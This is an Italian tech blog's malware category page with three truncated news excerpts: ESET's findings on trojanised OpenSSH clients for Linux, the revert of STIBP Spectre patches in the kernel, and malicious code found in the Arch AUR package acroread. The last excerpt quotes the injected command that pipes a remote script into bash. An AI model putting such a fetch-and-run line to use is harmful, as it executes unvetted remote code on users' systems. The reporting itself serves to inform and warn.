Archivi categoria: malware

ESET: trovate 21 “nuove” famiglie di malware per Linux

Nonostante Linux sia considerato uno dei sistemi operativi più sicuri, nel corso degli anni il numero di malware che prendono di mira il Pinguino sono aumentati, anche se in misura quasi infinitesimale se comparati a quelli sviluppati per Windows. Numeri così bassi hanno fatto un po’ “abbassare la guardia” agli addetti ai lavori che tenderebbero a fare molta meno attenzione a questo aspetto di come non farebbero su una piattaforma Microsoft. Questa settimana ESET ha pubblicato un interessantissimo paper di 53 pagine in cui espone nel dettaglio ben 21 “nuove” famiglie di malware per Linux, tutte che operano nella stessa maniera: sono versioni trojan del client OpenSSH. E virgolettiamo “nuove” perché ESET ha scoperto che sono in circolazione indisturbate da oltre quattro anni! Questi malware sono sviluppati come strumenti da deployare poi in più complesse botnet che rimpiazzano sul sistema attaccato la versione legittima di OpenSSH con quella malevola. Di queste 21 famiglie: 18 includono delle feature che sottraggono le credenziali (password e keys); 17 includono delle backdoor che permettono di riconnettersi in qualunque momento alla macchina infetta. ESET ammette però che, se sono arrivati a queste scoperte, è grazie ad un altro malware: Windigo. Durante le analisi della botnet [...]

Linux e la coperta corta della sicurezza contro le performance, tra Spectre e malware c’è poco da stare sereni

La scorsa settimana abbiamo parlato delle patch STIBP (Single Thread Indirect Branch Predictors, una protezione dalle varianti di Spectre) e di come queste avessero influenzato negativamente le performance del Kernel Linux, al punto che Linus Torvalds era intervenuto, educatamente, sottolineando l’importanza di rendere opzionali questo genere di patch così impattanti. Bene, lo scorso venerdì sono state pubblicate le nuove release dei vari Kernel attualmente manutenuti, in particolare le versioni 4.19.4 e 4.14.83 hanno visto includere il revert (o annullamento) della patch relativa a STIBP. Le patch originali erano già un backport dal ramo 4.20, ma visti i problemi di performance evidenziati ed il continuo sviluppo che ancora è eseguito in ambito STIBP si è preferito optare per il revert. La questione risulta interessante per sollevare nuovamente il tema dei problemi alle CPU, di cui abbiamo tanto parlato, da cui è necessario proteggersi: performance e sicurezza non andranno mai d’accordo, almeno fino a quando non verranno prodotte CPU non affette da Meltdown e Spectre, ed il giorno della loro distribuzione di massa è ancora lontano. Se a tutto questo aggiungiamo le altre minacce che ogni giorno vengono scoperte, c’è poco da stare tranquilli. L’ultima minaccia di questo tipo in ordine di [...]

Trovato malware nel repository AUR di Arch Linux

Due settimane fa era toccato ad uno dei mirror dei repository di Gentoo; oggi la notizia che anche Arch User Repository (AUR) è stato compromesso. AUR permette l’installazione di software non ufficialmente supportato da Arch; i pacchetti ospitati sono praticamente delle “ricette” per verificare (e installare) le dipendenze, quindi scaricare, se necessario compilare, ed infine pacchettizzare il software richiesto; a questo punto pacman (il gestore di pacchetti di Arch) può installarlo come qualsiasi altro pacchetto. Calma, però: a differenza di Gentoo, dove il numero di pacchetti modificati è stato tanto consistente da considerare il repository come “totalmente compromesso”, per Arch sembra che i pacchetti contenenti codice malevolo si contino sulle dita di una mano (per ora). Un utente ha segnalato tramite la mailing list di Arch una variazione nel pacchetto acrored presente in AUR: il pacchetto, pur risultando “orfano” (ovvero senza maintainer, un utente di riferimento che lo gestisse), era stato modificato improvvisamente il 7 Luglio dall’utente “xeactor”, aggiungendo del codice assolutamente non sospetto: curl -s https://ptpb.pw/~x|bash -& L’utente medio di Arch, lo sappiamo (ed ogni riferimento ad altri autori del blog è puramente casuale, ndr), adora leggersi il contenuto dei pacchetti tra una compilazione e l’altra, dunque inutile dire che il problema [...]